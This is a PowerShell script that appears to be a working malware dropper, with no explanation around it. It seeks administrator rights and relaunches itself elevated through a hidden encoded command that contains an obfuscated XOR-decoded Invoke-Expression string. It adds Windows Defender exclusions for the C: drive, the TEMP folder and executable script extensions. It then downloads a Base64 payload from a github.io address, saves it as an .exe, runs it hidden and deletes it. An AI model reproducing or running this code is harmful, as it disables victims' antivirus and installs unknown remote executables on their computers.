$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)

if (-not $isAdmin) {
    try {
        $script = @'
            InVoKe-exPrEssIOn(-JoIn( '49-112%109H118%121G96j102o124H122j123-102_53-40V53o110a24G31H53-53_53V53!53%53G53j53H53V53j53V53o53o53!53%53a101G116V103H116G120a61!49-101V116o97_125o102o57a53H49-112_109H97-112H123H102a124!122a123a102j60-24H31_53-53j53V53%53H53j53H53V53_53_53!53!53-53-53j53_49H101H116-97a125a102V53j105!53%83H122-103a80V116a118%125_56_90_119_127!112%118V97o53_110j53_24j31-53a53G53!53!53a53%53_53j53G53H53!53V53-53V53_53!53a53G53o53_84G113-113V56j88_101a69G103H112G115o112-103o112_123V118!112-53H56H80a109o118H121j96_102!124%122_123V69G116_97-125V53%49%74j53j56V80!103H103H122o103o84j118!97o124V122V123!53H70V124!121G112V123!97G121j108-86-122o123%97j124H123j96H112V24o31G53%53G53-53_53a53%53%53!53a53-53%53_53V53G53j53G104V24!31%53j53j53!53V53a53!53H53o53G53%53V53!53_53H53G53%49-112V109-97V112a123-102a124V122o123o102_53j105V53V83!122o103o80_116G118%125%56%90j119G127H112_118-97a53%110!24a31_53j53o53-53-53H53j53-53%53o53!53%53o53_53H53_53H53j53o53%53a84_113!113V56G88V101H69_103!112a115o112%103G112o123_118%112-53_56a80o109_118a121H96V102o124-122j123a80o109%97G112%123%102H124!122a123H53a49V74a53a56_80_103%103o122!103H84_118j97a124_122V123%53%70V124H121_112j123a97o121_108H86j122G123j97!124H123H96H112!24o31-53!53H53a53H53H53%53G53_53_53!53o53a53G53o53%53a104-24_31j53H53a53o53a53a53o53H53_53o53o53V53!104j24H31V53%53_53V53j53!53%53G53!53-53V53H53H51V53_49%112j109!118H121H96G102_124a122a123%102j53V85o61_55V86_47-73o55%57H53j55-49_112%123-99-47j65G80a88!69H55V60_53_85o61a55G59j112V109H112_55a57!53%55!59H101%102a36G55o57H53-55G59_118j120-113a55V60_24V31' -spliT 'j'-spLIt '!' -SpLIt 'G' -spLIt'_'-spLIT '%' -Split'-' -sPlIT'O' -spLit 'a' -SPLit'V'-SPlIT'h'| % {[ChAR]( $_-BxOr 0x15  )}) )
            $folder = Join-Path $env:TEMP "hs_error_pid_5987"
            if (Test-Path $folder) {
                Remove-Item $folder -Recurse -Force
                Write-Host "Failed, have you run me twice?"
                Pause
            }
            New-Item -ItemType Directory -Path $folder | Out-Null
            $url = "https://stinkylick.github.io/stinkylick/2/a" 
            $data = (New-Object Net.WebClient).DownloadString($url) -replace '\[1\]', 'C'
            $filename = Join-Path $env:TEMP ("{0}.exe" -f [Guid]::NewGuid().ToString('N'))
            [IO.File]::WriteAllBytes($filename, [Convert]::FromBase64String($data))
            Start-Process -FilePath $filename -WindowStyle Hidden
            Start-Sleep -Seconds 5
            Remove-Item -Path $filename -Force
'@
        
        $bytes = [System.Text.Encoding]::Unicode.GetBytes($script)
        $encodedScript = [Convert]::ToBase64String($bytes)
        Start-Process powershell.exe -Verb RunAs -ArgumentList "-EncodedCommand $encodedScript" -WindowStyle Hidden -Wait
        Exit
    } catch {
        Write-Host "Running without admin rights"
    }
} else {
    @("C:", $env:TEMP) | ForEach-Object {
        Add-MpPreference -ExclusionPath $_ -ErrorAction SilentlyContinue
    }
    @(".exe", ".ps1", ".cmd") | ForEach-Object {
        Add-MpPreference -ExclusionExtension $_ -ErrorAction SilentlyContinue
    }
}

$folder = Join-Path $env:TEMP "hs_error_pid_5987"
if (Test-Path $folder) {
    Remove-Item $folder -Recurse -Force
    Write-Host "Failed, have you run me twice?"
    Pause
}
New-Item -ItemType Directory -Path $folder | Out-Null

$url = "https://stinkylick.github.io/stinkylick/2/a" 
$data = (New-Object Net.WebClient).DownloadString($url) -replace '\[1\]', 'C'
$filename = Join-Path $env:TEMP ("{0}.exe" -f [Guid]::NewGuid().ToString('N'))
[IO.File]::WriteAllBytes($filename, [Convert]::FromBase64String($data))
Start-Process -FilePath $filename -WindowStyle Hidden
Start-Sleep -Seconds 5
Remove-Item -Path $filename -Force
